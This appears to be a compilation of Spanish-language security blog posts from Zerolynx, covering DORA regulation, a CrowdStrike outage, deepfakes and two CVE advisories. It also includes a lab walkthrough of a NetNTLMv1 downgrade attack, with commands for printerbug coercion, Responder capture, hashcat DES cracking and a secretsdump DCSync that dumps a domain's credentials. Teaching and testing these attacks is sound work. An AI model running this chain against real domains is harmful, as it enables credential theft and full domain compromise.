Las Autoridades Europeas de Supervisión (AES) acaban de lanzar el segundo paquete RTS bajo DORA.

El 27 de diciembre de 2022 fueron publicadas en el Diario Oficial de la Unión Europea dos normas diferentes, pero muy ligadas entre sí, relacionadas con la ciberseguridad. Entraron en vigor 20 días después, el 16 de enero de 2023. Nos referimos al Reglamento (UE) 2022/2554: Resiliencia Operativa Digital (DORA, Digital Operational Resilience Act), dirigida al Sector Financiero y a la Directiva (UE) 2022/2555: NIS 2 (v2 de Network and Information Security), dirigida a elevar la ciberseguridad en la UE, utilizando como palanca a sectores esenciales. Si os fijáis, los números de ambas regulaciones son consecutivos, lo que denota que fueron diseñadas desde un punto de vista conjunto.

Para los que no estéis familiarizados con el mundo del derecho, DORA es un reglamento (norma de la UE de aplicación inmediata) que tiene únicamente una excepción, no aplicará hasta el 17 de enero de 2025. Por el contrario, NIS2 es una directiva (norma de la UE que requiere que los estados miembros la traspongan). Debe regularse por una norma con rango de Ley antes del 17 de octubre de 2024. Pero, por el momento, a la fecha de este post (29 de julio de 2024), no ha sido traspuesta, y parece difícil que se pueda cumplir la fecha marcada por la unión.

El reglamento DORA, sobre el que centraremos el presente artículo, exige sanciones y medidas eficaces, proporcionales y disuasorias, contemplando asimismo sanciones administrativas y penales (una novedad). Algo tambien clave y novedoso es que podrán aplicarse a los miembros del consejo. Es más, DORA obliga a que sean publicadas las sanciones administrativas impuestas a los miembros del consejo, con nombre y apellidos, hasta 5 años.

Para proporcionar orientación sobre cómo implementar estas disposiciones, las Autoridades Europeas de Supervisión (AES) desarrollan las Regulatory Technical Standards o RTS (legislación de Nivel 2). El primer paquete RTS fue publicado hace poco más de un año, en junio de 2023. Y el segundo paquete tal y como se preveía, ha sido publicado la pasada semana, una vez finalizadas las elecciones europeas.

El primer paquete ha sido ampliamente debatido bajo consulta pública, y, el texto que definía DORA en apenas 79 páginas ha crecido en el segundo paquete RTS de forma considerable.

Cito textualmente las nuevas incorporaciones:

The three European Supervisory Authorities (EBA, EIOPA and ESMA – the ESAs) published today the second batch of policy products under the Digital Operational Resilience Act (DORA). This batch consists of four final draft regulatory technical standards (RTS), one set of Implementing Technical Standards (ITS) and 2 guidelines, all of which aim at enhancing the digital operational resilience of the EU’s financial sector.

The package focuses on the reporting framework for ICT-related incidents (reporting clarity, templates) and threat-led penetration testing while also introducing some requirements on the design of the oversight framework, which enhance the digital operational resilience of the EU financial sector, thus also ensuring continuous and uninterrupted provision of financial services to customers and safety of their data.

The ESAs are publishing the following final draft technical standards:

1. RTS and ITS on the content, format, templates and timelines for reporting major ICT-related incidents and significant cyber threats; 

2. RTS on the harmonization of conditions enabling the conduct of the oversight activities;

3. RTS specifying the criteria for determining the composition of the joint examination team (JET); and

4. RTS on threat-led penetration testing (TLPT).

The set of guidelines include:

• Guidelines on the estimation of aggregated costs/losses caused by major ICT-related incidents; and

• Guidelines on oversight cooperation.

Este es un pequeño resumen de cada uno de los documentos del nuevo paquete que contiene 4 RTS (Regulatory Technical Standards) y 1 ITS (Implementing Technical Standards):

• RTS y ITS sobre el contenido, formato, plantillas y plazos para reportar incidentes importantes relacionados con las TIC y amenazas cibernéticas significativas: Este documento establece estándares técnicos y de implementación para la notificación de incidentes y amenazas cibernéticas, especificando qué información se debe reportar, en qué formato, y dentro de qué plazos.

• RTS sobre la armonización de las condiciones que permiten la realización de actividades de supervisión: Establece los requisitos para armonizar las condiciones bajo las cuales se realizan las actividades de supervisión, asegurando un enfoque coherente en toda la UE.

• RTS que especifica los criterios para determinar la composición del equipo de examen conjunto (JET): Define los criterios para formar equipos de examen conjuntos que supervisen las pruebas de penetración y otras evaluaciones, asegurando que se cuente con el personal adecuado y calificado.

• RTS sobre pruebas de penetración lideradas por amenazas (TLPT): Proporciona los requisitos para llevar a cabo pruebas de penetración basadas en amenazas específicas, con el fin de evaluar la resiliencia de las entidades financieras ante ciberataques.

Junto a estos documentos, encontramos 2 guías con el siguiente contenido:

• Guías sobre la estimación de costos/pérdidas agregados causados por incidentes importantes relacionados con las TIC: Ofrece pautas para calcular los costos y pérdidas totales derivados de incidentes significativos relacionados con las TIC, ayudando a las entidades a evaluar el impacto financiero de dichos incidentes.

• Guías sobre la cooperación en la supervisión: Define cómo deben cooperar las autoridades de supervisión en la supervisión de las actividades de las entidades financieras, promoviendo una colaboración eficaz y una supervisión coherente a nivel europeo.

La EBA (European Banking Authority), parte de la ESA, ha trasladado que las guías ya han sido adoptadas por los Consejos de Supervisión de las tres Autoridades Europeas de Supervisión (ESAs). Los borradores finales de los estándares técnicos han sido enviados a la Comisión Europea, que ahora comenzará a revisarlos con el objetivo de adoptarlos en los próximos meses. Los RTS restantes sobre subcontratación se publicarán próximamente.

Tenéis más detalles sobre ello en: https://www.eba.europa.eu/publications-and-media/press-releases/esas-published-second-batch-policy-products-under-dora

La UE está avanzando significativamente hacia la mejora de la resiliencia operativa digital del sector financiero. Al establecer reglas claras para la notificación de incidentes, pruebas de penetración y supervisión, estas políticas buscan garantizar una respuesta coherente y efectiva ante las ciberamenazas a las que actualmente se enfrenta el tejido empresarial financiero. Obviamente, esto no solo aumentará la transparencia en la respuesta a ciberataques, sino que también fortalecerá la seguridad y estabilidad del sector financiero, ayudando a las empresas a estar mejor preparadas ante posibles amenazas digitales.

En próximos posts profundizaremos en los documentos publicados en este nuevo paquete RTS.

Egoitz San Martín, Analista de Ciberseguridad en Grupo Zerolynx.

NTLMv1 Downgrade attack

NetNTLMv1 downgrade 

Como hemos comentado en entradas anteriores tras forzar una autenticación y obtener el hash NetNTLM de la contraseña del usuario máquina de la víctima, se nos presentan, principalmente, tres escenarios diferentes de explotación, en este caso vamos a estar hablado de: 

• NetNTLMv1 downgrade  

En este escenario, el atacante aprovechará el uso del protocolo de autenticación NetNTLMv1 en la red. 

Para poder abusar de dicho protocolo de autenticación, el servidor vulnerable a “Coerce Autentication” deberá tener configurado en el registro la clave “LmCompatibilityLevel” y se encuentra con un valor de 2 o menos. 

Esto se puede configurar habilitando el envió de respuestas LM y NTLM en la política de grupo denominada como “Seguridad de red: nivel de autenticación de LAN Manager”. 

Resumen 

A continuación, se explica a grandes rasgos el proceso de explotación de este ataque: 

1. Obtener una Respuesta NetNTLMv1 de la cuenta de máquina del controlador del dominio forzando la autenticación con cualquier vulnerabilidad de “Coerce Autentication”. 
2. Transformar el hash NetNTLMv1 obtenido a un formato para poder ser crackeado en el modo DES. 
3. Crackear las diferentes partes del hash y obtener las claves DES de cada una de ellas. 
4. Transformar las claves DES Obtenidas a formato NTLM. 
5. Realizar un DCSync para obtener el NTDS mediante Pass The Hash haciendo uso del hash NTLM obtenido en los pasos anteriores. 

Componentes del laboratorio de pruebas 

A continuación, describimos brevemente los activos que se encuentran en el laboratorio de pruebas: 

• Attack_Machine – Esta máquina hace referencia a una Kali Linux desde donde realizaremos el ataque para obtener una “Coerce Autentication” y tener a la escucha el software para obtener el hash del usuario maquina en formato NetNTLMv1. 

• DC.corp.lab – Controlador de dominio con el dominio “corp.lab” configurado, el cual va a ser víctima del ataque. Se configurará un usuario denominado como “Bob” en dicho dominio sin privilegios para emular el ataque desde el compromiso de este. Dicho servidor tendrá aplicada la política de grupo nombrada anteriormente. 

Desarrollo del ataque 

Obtener una Respuesta NetNTLMv1 

Para comenzar el ataque, deberemos comprobar si el controlador de dominio es vulnerable a alguno de los ataques de “Coerce Autentication” explicados “aquí”. En este caso, la explotación la realizaremos abusando del MS-RPC denominado como MS-RPRN mediante el script Printer Bug. 

Se deberá comprobar que el DC tiene dicho MS-RPC habilitado mediante el siguiente comando: 

Terminal

                python3 rpcdump.py @dc.corp.lab | grep 'MS-RPRN' 

      

Tras comprobar que el controlador de dominio es vulnerable a dicha “Coerce Autentication”, se deberá configurar la máquina del atacante. Para ello se deberá editar el archivo de configuración del software conocido como Responder, de la siguiente manera:

Terminal

                Sudo nano /etc/responder/Responder.conf 

				SMB = On 

				HTTP = On 

				;Challenge = Random 

			Challenge = 1122334455667788 

      

Una vez editado el archivo de configuración de responder, se deberá ejecutar de la siguiente manera para ponerlo a la escucha. El flag –lm fuerza un downgrade en ciertas versiones de Sistema Operativo. 

Terminal

                sudo responder -I eth0 -wv --lm  

      

Una vez teniendo en ejecución “Responder”, se procederá a explotar la “Coerce Autentication”. 

Terminal

                'python3 printerbug.py "CORP/bob:password" @dc.corp.lab attack_machine'

      

Tras forzar la autenticación del usuario máquina del controlador de dominio contra la máquina del atacante, se obtiene el hash NetNTLMv1 de dicho usuario. 

Transformar el hash NetNTLMv1 obtenido a un formato para poder ser crackeado 

Tal y como se ha comentado, una vez obtenido el hash NetNTLMv1 se deberá transformar a un formato que pueda ser crackeado en el modo DES. Para ello, se hará uso de la herramienta ntlmv1-multi, la cual proporcionará los siguientes pasos a seguir para el correcto crackeo del hash. 

Terminal

                python3 ntlmv1.py --ntlmv1 'hash ntlmv1' 

      

Como se puede observar en la captura de pantalla anterior, la propia herramienta muestra como calcular los 4 últimos dígitos del hash NTLM, y facilita, por un lado, los hashes que se deben crackear a formato DES, así como el comando que se debe ejecutar.  

Crackear las diferentes partes del hash y obtener las claves DES de cada una de ellas 

Por lo tanto, lo primero, se ejecutará el cálculo de los últimos 4 dígitos del hash NTLM de la siguiente manera haciendo uso de una herramienta de hashcat:

Terminal

                /usr/lib/hashcat-utils/ct3_to_ntlm.bin 'output obtenido con ntlmv1.py' 

      

Por otro lado, se procederá a crackear a formato DES los dos hashes proporcionados por la herramienta ntlmv1-multi mediante la herramienta de crackeo hashcat con el siguiente comando: 

Terminal

          hashcat.exe -m 14000 -a 3 -1 charsets/DES_full.hcchr --hex-charset 'fichero con hashes' ?1?1?1?1?1?1?1?1       

      

NOTA: En las versiones antiguas de hashcat, se hace uso del “charset” DES_FULL.charset, en las versiones actualizadas, se hace uso de DES_full.hcchr. 

Tras el proceso de crackeo, se obtiene las siguientes claves DES: 

Transformar las claves DES Obtenidas a formato NTLM: 

Una vez obtenidas las dos claves DES, se deberá hacer uso de otras herramientas de hashcat la cual permitirá transformas dichas claves al formato NTLM. 

Terminal

                 /usr/lib/hashcat-utils/deskey_to_ntlm.pl 'DES KEY crackeada 1' 

		/usr/lib/hashcat-utils/deskey_to_ntlm.pl 'DES KEY crackeada 2' 

      

Realizar un de DCSync para obtener el NTDS mediante Pass The Hash :

Tras obtener todas las partes del hash NTLM del usuario máquina del controlador de dominio, es posible realizar un DCSync y obtener el NTDS del dominio mediante la herramienta secretsdump.py de impacket, realizando un ataque de Pass The Hash: 

Terminal

                Python3 secretsdump.py -just-dc-ntlm -hashes ‘hash_ntlm’ ‘corp.lab/dc$@dc.corp.lab’’  

      

Dimas Pastor, Senior Analyst en Grupo Zerolynx.

¿Por qué se han caído los servicios de medio mundo tras un fallo de Crowdstrike?

Hoy, 19 de julio de 2024, muchas empresas a nivel global se han encontrado con el conocido "Blue Screen of Death" (BSOD) en sus sistemas. Esta falla ha obligado a muchas compañías a interrumpir sus servicios debido a la inoperatividad de numerosos equipos (tanto puestos de trabajo, como servidores),  entre ellas, por ejemplo, en organizaciones de la talla de Aena o Vocento. El problema ha sido atribuido a un problema con el servicio del popular software de ciberseguridad, CrowdStrike.

Según confirmó CrowdStrike, el masivo BSOD en Windows se debe a una actualización del sensor Falcon, específicamente, el utilizado en la carga del agente csagent.sys. En X se han reportado numerosos errores de la Pantalla Azul de la Muerte (BSOD) en hosts de Windows, los cuales parecen estar asociados con varias versiones de los sensores de CrowdStrike. Parece ser que hay varios workaround para poder solventar el problema, aunque el propio Crowdstrike ha tenido que dar marcha atrás con esta actualización.

https://x.com/troyhunt/status/1814174010202345761

El sensor Falcon de CrowdStrike es una solución avanzada de ciberseguridad que protege los sistemas contra amenazas y ataques. Utiliza inteligencia artificial y análisis en la nube para detectar y prevenir malware, ransomware y otras actividades maliciosas en tiempo real. 

Alguna de las propias soluciones o workaround que se han ofrecido se basan directamente en entrar al host en modo seguro y eliminar el propio agente de forma manual. Aunque realmente habrá que esperar a que Crowdstrike de una solución definitiva al problema para que quede solucionando de forma definitiva.

https://x.com/mike_d_ok/status/1814187157562810388

https://x.com/_johnhammond/status/1814240295921565805

Autor: Alberto Espada, analista de ciberseguridad en Zerolynx.

IA y Deepfakes: un dúo peligroso en las manos equivocadas

El emergente crecimiento de la Inteligencia Artificial ha permitido transformar sectores clave como la medicina, la economía, el sector energético o el transporte. En el panorama actual, la Inteligencia Artificial tiene un potencial inmenso para construir una sociedad mejor. Sin embargo, la IA es una herramienta de doble filo tan poderosa que puede ser explotada para desarrollar soluciones que encierren fines negativos o maliciosos.

En el plano de la ciberseguridad, la Inteligencia Artificial ha permitido la evolución y mejora de técnicas de ingeniería social, facilitando la ejecución de campañas de ciberataques más eficaces y difíciles de detectar. 

En este contexto, se ha visto desarrollados nuevos fraudes impulsados por la IA, especialmente en lo que conlleva a la creación de deepfakes.

¿Qué es el deepfake?

El término deepfake resulta de la combinación del término Deep Learning y fake. Así, este término hacer referencia a la técnica por la cual, empleando algoritmos de Inteligencia Artificial complejos como es el Deep Learning, se manipulan contenidos de carácter audiovisual datándolo de un efecto altamente realista. Esta característica implica que, bajo la percepción convencional de un humano, es muy complicado determinar si el contenido audiovisual que se está consumiendo es verdad o falaz. 

En este contexto, la tecnología deepfake para la suplantación de identidad ha conseguido expandirse a todas las plataformas digitales y al ámbito de la comunicación personal, la industria cinematográfica, así como al sector corporativo y gubernamental. Si bien abre oportunidades para la creatividad y la innovación en la producción de contenido digital, también presenta riesgos considerables para la privacidad y la seguridad.

Aunque deepface y deepvoice no son términos ampliamente reconocidos dentro del deepfake, podemos explicarlos de forma separada para entender las aplicaciones dentro del mundo de la ciberseguridad:

• Deepfaces: Consisten en crear imágenes con un alto nivel de realismo desde cero, pero siendo completamente ficticias. 

• Deepvoices: Esta tecnología permite generar voces humanas sintéticas que suenan muy naturales a partir de texto escrito. Además de generar una voz de cero, es posible falsificar la voz de una persona real entrenando a la IA con muestras de la voz real. Con unos minutos de audio de la voz de una persona, cualquier usuario podría clonar su voz y comprometer su seguridad y privacidad.

Casos reales de deepfake y ataques de IA

Algunos casos conocidos de deepfake o alteración y creación falsa de imágenes, audios y videos son los siguientes:

• Deepfake de Vladimir Putin y Donald Trump: En 2019, un video deepfake que representaba a Vladimir Putin y Donald Trump fue compartido en redes, donde ambos líderes políticos parecían discutir temas serios como el control de armas y la política internacional. Este tipo de contenido subraya cómo los deepfakes podrían ser utilizados para desinformar y manipular opiniones públicas.

• Deepfake de actores en películas pornográficas: Uno de los usos más controvertidos de los deepfakes ha sido la creación de videos pornográficos falsos que muestran a celebridades y personas públicas en escenas comprometedoras, como fue el caso de Emma Watson, Rosalía o Taylor Swift. Este tipo de contenido ha provocado preocupaciones legales y éticas sobre la privacidad y el consentimiento. 

• Deepfake de Barack Obama: En 2018, un video deepfake del expresidente de Estados Unidos, Barack Obama, fue creado por la empresa Jordan Peele's Monkeypaw Productions. En el video, Obama parece estar haciendo declaraciones inusuales y advirtiendo sobre los peligros de los deepfakes, lo que se hizo para concienciar sobre esta tecnología y sus posibles usos maliciosos. El vídeo está disponible en youtube en el siguiente enlace.

• Uno de los casos destacados de suplantación de voz es la del CEO de una empresa británica energética en marzo de 2019. En este incidente, los estafadores utilizaron inteligencia artificial para imitar la voz del CEO. Este alto directivo recibió una llamada telefónica de su supuesto jefe en la que se le indicaba que realizara una transferencia de 220.000€ a una cuenta bancaria externa. El CEO realizó la transferencia sin verificar la identidad de su jefe, dada la credibilidad de una llamada telefónica con una voz tan realista.

Un paso más en el deepfake…

Los avances en la sofisticación de los deepfakes convencionales son tan sustanciales que, en la actualidad, se han logrado realizar ejercicios de deepfakes en el contexto de una videollamada, lo que implica la capacidad de alterar en tiempo real la apariencia y voz de un individuo durante una llamada en vivo. 

Se plantea un problema mayor en esta situación, pues la dificultad en la detección de este tipo de estafas aumenta a gran escala. A pesar de la todavía escasa concienciación sobre este tipo de ejercicios de suplantación, es probable que dados los mediáticos casos sobre deepfake en estos últimos años, un usuario en internet pueda desconfiar de vídeos o imágenes que reflejen contenidos inusuales, o que un alto cargo directivo tome una actitud más dubitativa frente a una llamada de su jefe solicitando, de nuevo, cosas inusuales. Sin embargo, los deepfakes en tiempo real suponen un gran reto en la actualidad por la dificultad en su identificación. Y tú …¿dudarías de la identidad de la persona a la que estás viendo y escuchando al otro lado de la pantalla en tiempo real?

Sin embargo, esta técnica aún cuenta con pequeñas fallas relativas al movimiento de la cabeza y la perspectiva. Rotaciones de cabeza en el modelo de 90º o manos delante del rostro son algunas de las acciones habituales de una persona que los deepfakes aún no llegan a replicar de forma totalmente realista. Por lo tanto, mientras se desarrollan y mejoran las técnicas de detección de este tipo de ataques, puede llegar a resultar útil para detectar deepfake pedirle a la persona con la que se realiza la videollamada que mueva la cabeza o eleve el brazo (¡¡aunque no es la solución más recomendable!!).

Deepfake al alcance de todos

Uno de los aspectos más preocupantes del deepfake es su accesibilidad. Actualmente existen multitud de opciones software y aplicaciones gratuitas o con un coste muy reducido que permiten a los usuarios crear deepfakes con relativa facilidad.

Existen plataformas, como https://thispersonnotexist.org/, que generan retratos de personas que, pese a parecer imágenes de personas reales, son completamente falsas.

Otras herramientas conocidas para modificación de contenidos visuales son myEdit o PowerDirector. Estas herramientas, sumadas a clonadoras de voces como Vidnoz, son la combinación perfecta para ciberdelincuentes dispuestos a falsear y suplantar identidades en ámbitos digitales, pero también gubernamentales.

Tampoco podemos dejar de lado uno de los mejores servicios de Speech to Text, Eleven Labs, donde tambien podremos clonar voces de forma sencilla y rápida y a un coste realmente bajo. Por ejemplo, os mostramos en el siguiente audio que os hemos subido a MEGA, un ejemplo que hemos entrenado en unos pocos minutos:

Escuchar Demo de voz clonada

Finalmente, DeepFaceLive es una versión de deepfake en tiempo real del popular software DeepFaceLab.

Mediante una simple búsqueda sobre recursos deepfake, se encuentran cientos de recursos en línea con los que crear nuevos montajes y engaños fácilmente.

One more thing…

Dos años atrás, una multinacional china sufrió un ataque basado en la tecnología deepfake en el que se defraudaron 26 millones de dólares. 

Dada la repercusión mediática que tuvo este ataque, y en la lucha para la concienciación de las amenazas digitales emergentes, en Zerolynx se tuvo la oportunidad de desarrollar una prueba de concepto sobre deepfake en videollamadas de Teams. Los linces Javier Martín, Álvaro Caseiro y Daniel Rico, haciendo uso de herramientas accesibles por cualquier usuario de internet, realizaron un ejercicio de suplantación en un entorno seguro y controlado como campaña de concienciación para altos cargos de una empresa ejecutiva.

La suplantación al CEO en directo y durante una videollamada es un evento que causa desconfianza en la plantilla ante eventos sospechosos o inusuales como la aprobación de nuevas facturas, delegación de puestos de mando o cambios en los datos de proveedores o clientes. Una junta en la que se espera la presencia del CEO o no, es una buena oportunidad de poner a prueba la concienciación en seguridad de los altos cargos al mismo tiempo que se forma a todos los presentes sobre los riesgos que cada vez serán más habituales.

Alba Vara, analista de ciberseguridad en Zerolynx.

CVE-2024-4577: Inyección de argumentos PHP en Windows

El pasado 6 de Junio, Orange Tsai reveló una nueva vulnerabilidad que afectaba a PHP, teniendo alcance sobre todas las versiones de PHP para Windows (PHP en modo CGI en particular en idiomas: chino y japonés), inclusive en instalaciones por defecto a los servidores XAMPP. 

La raíz del problema radica en un mal procesamiento de caracteres por parte del motor CGI (parecido a la vulnerabilidad de hace 12 años CVE-2012-1823). Este motor interpreta (0xAD) y decodifica como un “guion suave”, el cual, PHP convertirá en un “guion real” gracias a la función de mapeo “best fit”, permitiendo así que un agente malicioso se aproveche para ejecutar código arbitrario 

Versiones afectadas 

Esta vulnerabilidad ha sido calificada según las métricas del CVSS 3.1 como 9.8 crítica según NIST, y las versiones afectadas son: 

• PHP 8.3 < 8.3.8 
• PHP 8.2 < 8.2.20
• PHP 8.1 < 8.1.29 

Explotación 

Para la explotación de esta vulnerabilidad son necesarias ciertas características en la máquina víctima: 

• El software PHP debe estar configurado en modo CGI. 

• Es posible la explotación si los binarios php.exe o php-cgi.exe están expuestos (todas las instalaciones por defecto en XAMPP para Windows). 

• El sistema operativo debe ser Windows. 

Debido a que esta vulnerabilidad es muy parecida a la ya mencionada CVE-2012-1823, se pueden utilizar técnicas de explotación de esta. Para ello, según estas técnicas, para traducir la inyección en RCE, se debe intentar inyectar los siguientes argumentos: 

Esto permitirá la entrada del cuerpo de la solicitud HTTP y la procesará usando PHP. Se creó un ejemplo de petición añadiendo el “guion suave” en lugar del “guion real”, y en el cuerpo de la petición se añadió un código php que permitía ver la página phpinfo, demostrando que se consiguió el RCE. 

Como se pueden ver en las capturas, se ha conseguido ejecutar código mediante la inyección de argumentos en la petición. Esto supone un problema grave porque un agente malicioso podría utilizar esta vulnerabilidad para controlar cualquier máquina afectada por este CVE, afectando a la confidencialidad, integridad y disponibilidad de esta.

Identificación y mitigación de la vulnerabilidad 

Para identificar la vulnerabilidad en los sistemas, se puede realizar mediante la inspección de la versión de PHP. 

Para mitigar la vulnerabilidad principalmente se debe actualizar el software PHP a las nuevas versiones parcheadas: 

• 8.3.8 

• 8.2.20 

• 8.1.29 

Es muy importante aplicar la actualización más reciente, ya que los agentes maliciosos están usando actualmente el rasomware TellYouThePass para explotarlo de forma activa. 

Javier Muñoz, Analista de Ciberseguridad en Zerolynx

CVE-2024-30078: Ejecución remota de código del controlador Wi-Fi de Windows

El pasado 11 de junio, Microsoft  publicó en sus noticias de parches una vulnerabilidad de alto impacto que afectaba al controlador de Wi-Fi de Windows, que consistía en una ejecución remota de código (RCE).

Explotación de la vulnerabilidad

Esta vulnerabilidad puede ser explotada por un atacante dentro del rango Wi-Fi de un dispositivo vulnerable, lo que le permite enviar paquetes especialmente diseñados al dispositivo sin necesidad de estar autenticado y sin necesidad de interacción del usuario. Si se explota con éxito, esto podría permitir al atacante ejecutar código arbitrario, lo que podría llevar a un compromiso completo del sistema.

En detalle

Un atacante puede aprovechar la vulnerabilidad del controlador Wi-Fi de Windows diseñando un punto de acceso Wi-Fi configurado con un SSID malicioso. Cuando el ordenador de la víctima escanea las redes Wi-Fi y encuentra el SSID del atacante, el código se ejecuta de forma remota en el sistema de la víctima.

El alcance del ataque puede incluir acceso no autorizado al sistema de la víctima, lo que podría provocar robo de datos, instalación de ransomware u otras acciones maliciosas.

La causa raíz de la vulnerabilidad es una validación de entrada incorrecta en el controlador Wi-Fi. Este fallo permite a un atacante manipular la entrada y desbordar un búfer, lo que puede ser explotado para ejecutar código malicioso de forma remota. 

Requisitos de ataque y versiones afectadas

Actualmente no existe un exploit publicado que permita probar la debilidad, aun así, para poder explotarla existen unos requisitos y características:

• Es necesario estar cerca de la red del controlador, concretamente dentro del rango de red Wi-Fi.

• La explotación se realiza sin necesidad de estar autenticado.

La vulnerabilidad ha sido catalogada con el identificador CVE-2024-30078 y tiene una puntuación de 8.8 según las métricas del CVSS 3.1.

Los sistemas afectados por esta vulnerabilidad son los siguientes:

• Windows 10 (Versiones 1507, 1607, 1809, 21h2, 22h2)

• Windows 11 (Versiones 21h2, 22h2, 22h3, 23h2)

• Windows Server (2008 SP2, 2008 R2 SP1, 2012, 2012 R2, 2016, 2019, 2022, incluyendo las instalaciones Server Core)

Mitigación y detección de la vulnerabilidad

Para detectar esta vulnerabilidad es necesario revisar la versión actual del sistema.

Para mitigar esta vulnerabilidad el principal aspecto a tratar es:

• Habilitar las actualizaciones automáticas, procurando tener la versión más reciente disponible.

• Evitar conectarse a redes públicas.

Javier Muñoz, Analista de Ciberseguridad en Zerolynx.